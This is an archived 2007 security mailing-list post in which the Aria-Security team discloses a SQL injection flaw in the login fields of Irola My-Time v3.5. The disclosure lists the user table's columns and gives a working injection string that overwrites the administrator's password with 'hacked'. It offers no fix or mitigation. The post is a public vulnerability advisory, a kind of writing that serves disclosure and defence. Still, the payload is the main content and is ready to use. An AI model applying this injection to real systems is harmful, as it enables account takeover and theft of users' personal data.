Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Aria-Security.net: Irola My-Time v3.5 SQL Injection

from [no-reply] Network Security [Permanent Link]
Subject: Aria-Security.net: Irola My-Time v3.5 SQL Injection
Date: 23 Nov 2007 09:53:35 -0000 
Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory (and more details) @ 
http://aria-security.net/forum/showthread.php?p=1106
Irola My-Time v3.5
http://www.irola.com


Username/Password Fields can run SQL Queries. Therefore:
We get the Tables:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone



Useful Injection: (changes admin's passwsord to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

MORE HELP AT the Original Page.

Greetz: AurA
Credits goes to Aria-Security Team
Regards,
The-0utl4w
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Aria-Security.net: Irola My-Time v3.5 SQL Injection, no-reply <=
Previous by Date:  Re: Re: Gadu-Gadu Local/Remote Buffer Overflow vulnerability, emacs25
Next by Date:  [0day Remote Command Execution] VigileCMS <= 1.8 Stealth, wegotyourbox
Previous by Thread:  [ MDKSA-2007:231 ] - Updated cacti packages fix SQL injection vulnerability, security
Next by Thread:  [0day Remote Command Execution] VigileCMS <= 1.8 Stealth, wegotyourbox
Indexes:  [Date] [Thread] [Top] [All Lists]